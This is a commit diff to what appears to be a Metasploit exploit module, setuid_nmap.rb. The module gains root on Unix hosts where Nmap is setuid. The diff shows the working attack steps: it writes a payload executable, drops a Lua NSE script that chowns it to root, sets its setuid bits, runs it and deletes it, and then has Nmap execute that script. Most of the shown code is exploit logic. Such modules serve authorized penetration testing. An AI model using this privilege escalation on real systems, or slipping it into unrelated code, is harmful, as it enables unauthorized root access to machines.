Use Msf::Post::File#setuid? in setuid_nmap

wvu · wvu · commit d3b394666928 · 2018-01-23T02:05:26.000-06:00
diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb
@@ -51,12 +51,11 @@ def initialize(info={})
   end
 
   def check
-    stat = session.fs.file.stat(datastore["Nmap"])
-    if stat and stat.file? and stat.setuid?
-      vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
-      return CheckCode::Vulnerable
+    if setuid?(datastore['Nmap'])
+      vprint_good("#{datastore['Nmap']} is setuid")
+      CheckCode::Vulnerable
     end
-    return CheckCode::Safe
+    CheckCode::Safe
   end
 
   def exploit
@@ -69,16 +68,16 @@ def exploit
       write_file(exe_file, generate_payload_exe)
       evil_lua = %Q{
         os.execute("chown root:root #{exe_file}");
-        os.execute("chmod 6777 #{exe_file}");
+        os.execute("chmod 6700 #{exe_file}");
         os.execute("#{exe_file} &");
-        os.execute("rm #{exe_file}");
+        os.execute("rm -f #{exe_file}");
       }
     end
     lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
     print_status("Dropping lua #{lua_file}")
     write_file(lua_file, evil_lua)
 
-    print_status("running")
+    print_status("Running #{lua_file} with Nmap")
 
     scriptname = lua_file
     if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ def exploit
       # Versions before 4.75 (August 2008) will not run scripts without a port scan
       cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
     ensure
-      cmd_exec "rm -f #{lua_file} #{exe_file}"
+      rm_f(lua_file, exe_file)
     end
 
   end
